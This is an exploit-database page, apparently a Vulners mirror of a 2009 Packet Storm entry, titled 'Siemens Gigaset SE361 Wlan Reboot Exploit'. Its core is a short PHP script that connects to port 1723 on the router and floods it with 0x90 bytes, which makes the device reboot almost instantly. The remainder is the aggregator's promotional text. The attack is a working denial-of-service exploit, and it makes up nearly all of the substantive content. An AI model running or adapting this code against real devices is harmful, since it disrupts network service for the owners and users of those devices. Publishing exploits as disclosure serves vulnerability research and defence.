Lucene search
K

Siemens Gigaset SE361 Wlan Reboot Exploit

🗓️ 11 Sep 2009 00:00:00Reported by crashbrzType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

Siemens Gigaset SE361 Wlan Reboot Exploi

Code
`Attacking port 1723(flood), it restarts the device almost instantly, here's the code in PHP.  
It takes a few bytes for the AP to automatically restart  
  
<?php  
$apaddr = "192.168.2.1";  
$apport="1723";  
  
  
$con = fsockopen($apaddr, $apport, $errno, $errstr);  
if (!$con) {  
echo "$errstr ($errno)<br />\n";  
} else {  
$trash = str_repeat("\x90","261");  
fwrite($con, $trash);  
while (!feof($con)) {  
echo "$trash \r\n";  
}  
fclose($con);  
}  
?>   
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Sep 2009 00:00Current
0.6Low risk
Vulners AI Score0.6
25